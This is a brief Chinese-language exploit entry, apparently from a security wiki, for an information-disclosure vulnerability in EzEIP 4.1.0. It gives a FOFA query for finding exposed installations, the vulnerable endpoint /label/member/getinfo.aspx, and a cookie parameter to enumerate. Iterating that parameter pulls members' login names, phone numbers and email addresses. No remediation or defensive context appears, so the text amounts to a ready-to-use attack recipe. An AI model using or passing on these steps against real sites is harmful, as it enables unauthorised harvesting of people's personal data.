EzEIP_4.1.0_信息洩露漏洞

# EzEIP 4.1.0 信息洩露漏洞
==FOFA==

"ezEIP"

==漏洞利用==
漏洞Url為:

/label/member/getinfo.aspx

訪問時添加Cookie(通過遍歷獲取用戶的登錄名電話郵箱等信息):

WHIR_USERINFOR=whir_mem_member_pid=1;

==參考==
https://short.pwnwiki.org/?c=NqyKZe

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容